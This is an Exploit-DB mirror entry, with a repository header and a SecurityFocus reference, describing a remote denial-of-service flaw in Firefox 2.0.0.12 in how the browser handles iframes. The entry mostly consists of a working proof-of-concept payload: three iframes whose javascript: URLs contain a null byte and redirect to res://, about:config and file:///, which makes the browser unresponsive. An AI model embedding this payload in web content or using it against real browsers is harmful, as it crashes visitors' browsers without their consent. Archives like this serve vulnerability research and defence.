exploit-db-mirror/exploits/multiple/dos/31203.txt
Offensive Security d304cc3d3e DB: 2017-11-24
116602 new exploits

Too many to list!
2017-11-24 20:56:23 +00:00

11 lines
No EOL
663 B
Text

source: http://www.securityfocus.com/bid/27812/info
Mozilla Firefox is prone to a remote denial-of-service vulnerability because of the way the browser handles IFrames.
Attackers can exploit this issue to make the browser unresponsive and cause denial-of-service conditions.
Firefox 2.0.0.12 is vulnerable; other versions may also be affected.
<iframe id="x" src="javascript:document.location='\x00res://'" width="100%" height="200"></iframe>
<iframe id="y" src="javascript:document.location='\x00about:config'" width="100%" height="200"></iframe>
<iframe id="z" src="javascript:document.location='\x00file:///'" width="100%" height="200"></iframe>